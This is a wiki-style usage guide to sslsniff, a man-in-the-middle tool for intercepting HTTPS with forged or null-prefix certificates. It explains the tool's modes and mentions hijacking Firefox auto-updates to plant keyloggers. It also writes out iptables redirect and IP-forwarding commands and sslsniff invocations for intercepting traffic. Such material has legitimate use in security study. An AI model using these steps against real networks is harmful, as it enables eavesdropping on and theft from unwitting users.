A tool from Moxie Marlinspike.

Github repo: https://github.com/moxie0/sslsniff

Overview

sslsniff is slightly different from sslstrip. The intention of sslstrip is to turn HTTPS requests into HTTP requests, thereby forcing the sheep through an insecure connection. sslsniff is a tool focusing more on certificates.

sslsniff has two modes: authority mode, and targeted mode. In addition, it implements several attacks on Firefox auto-updates.

In authority mode, sslsniff acts as a certificate authority, using a custom certificate (or a self-signed, auto-generated certificate) to sign requests. This won't get you very far, since your certificate won't be trusted. This mode is also useful for exploiting improper implementation of BasicConstraints, which allows you to create a leaf node certificate in place of a CA certificate.

In targeted mode, sslsniff uses particular certificates for particular domains or sets of domains. This is intended for use when you have certificates that will only work for certain domains.

By taking over the Firefox auto-update process, you can install arbitrary binary blobs into the browser - keyloggers, certificate bundles, etc etc.

In Plain English

There is not an off-the-shelf attack to just automatically strip out SSL - modern sites and modern browsers are hip to that jive. You'll need to obtain a trusted certificate (ain't gonna happen) or you'll have to make your own. This tool allows you to explore the world of certificates, certificate authorities, and the many ways of tricking browsers into trusting and accepting your certificates.

Getting Help

Get some help:

sslsniff -h

Important Flags

Important flags:

-a/-t - authority vs targeted mode

Required options:

-c - file containing CA certificate or key (authority mode), or a directory with a collection of certificates (targeted mode)
-s port - port to listen on for ssl interception
-w file - file to log output to

Running

Prepare Firewall

A note on ports

sslsniff will use a minimum of 1, potentially 2 ports.

1 port will be dedicated to SSL sniffing. This is the port where all HTTPS traffic is redirected. This can be, e.g., port 6666.

1 port will be dedicated to HTTP sniffing, for OS fingerprinting. This is a different port. This can be, e.g., port 6667.

Running with MITM

Tell your machine to forward packets:

echo 1 > /proc/sys/net/ipv4/ip_forward

Flush rules from iptables:

$ iptables -F

Add a rule to intercept HTTPS traffic:

$ iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports <$listenPort>

If you're going to do client fingerprinting, add a rule to intercept HTTP traffic:

$ iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports <$httpListenPort>

Running in Authority Mode

To run in authority mode:

sslsniff -a -s <$listenPort> -w <$logFile> -c <$caCert>

Running In Targeted Mode

To run sslsniff in targeted mode, pass the -t flag and tell it where to find the directory of certificates with -c. The null prefix certificates in the certs directory come with sslsniff, to use those add the flag -m IPSCACLASEA1.crt. There are no targeted certs that come with sslsniff. There is a universal wildcard certificate example.

sslsniff -t -s <$listenPort> -w <$logFile> -m IPSCACLASEA1.crt -c <$certDir>

Example Certs

Wildcard cert: https://github.com/moxie0/sslsniff/blob/master/certs/wildcard

Flags

SSLSniff

From charlesreid1

Contents